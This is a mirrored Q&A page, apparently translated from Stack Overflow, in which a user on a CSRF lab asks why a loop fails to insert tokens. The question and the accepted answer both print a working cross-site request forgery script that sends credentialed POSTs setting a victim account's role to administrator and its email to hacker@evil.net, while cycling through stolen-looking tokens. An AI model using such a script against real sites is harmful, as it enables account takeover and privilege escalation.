堆棧內存溢出
  簡體   English   中英

JavaScript:在 for 循環中遍歷數組?

[英]JavaScript: Iterate through array in for loop?

 原文  2020-06-15 02:01:56       javascript/ arrays/ loops/ variables/ post

問題描述

我正在研究一個 CSRF 實驗室並嘗試迭代 20 多個令牌。

<script>
    var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
    var arrayLength = token.length;
    for (var i = 0; i < arrayLength; i++) {
        function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://csrf.labs/function.php", true);
            xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.withCredentials = true;
            var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
        }
        submitRequest.call();
    };
</script>

我正在使用+token[i]+將令牌插入到csrf參數中,但是在 Burp 中查看請求時,它似乎是“未定義的”:

POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0

username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=

我在這里做錯了什么? 我還是 JavaScript 的新手,所以也許+token[i]+不是正確的方法嗎?

2 個解決方案

解決方案1
 1 已采納  2020-06-15 02:11:10

您在同一個 scope 中定義i兩次,要么使用let定義它,要么使用另一個變量:

var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
    function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://csrf.labs/function.php", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
        var aBody = new Uint8Array(body.length);
        for (var j = 0; j < aBody.length; j++)
            aBody[j] = body.charCodeAt(j);
        xhr.send(new Blob([aBody]));
    }
    submitRequest.call();
};

解決方案2
 0  2020-06-15 02:14:30

當您創建fn submitRequest()時,會創建一個不知道var token的新 scope。所以我認為您需要在調用時將token[i]傳遞給您的 fn,並根據要求對 fn 進行原型制作。

function submitRequest(token){
}
submitRequest(token[i]);

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

相關問題 FOR循環遍歷數組 javascript遍歷數組 重新啟動/重用循環以遍歷 Javascript 中具有不同參數的數組 Javascript:通過對象迭代循環 Javascript遍歷數組中的對象? 在JavaScript中迭代嵌套數組 javascript通過insertBefore迭代數組 遍歷多維數組javascript Javascript:使用setInterval同步遍歷for循環 Javascript:遍歷/遍歷多個軸/方向?
相關標簽
 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM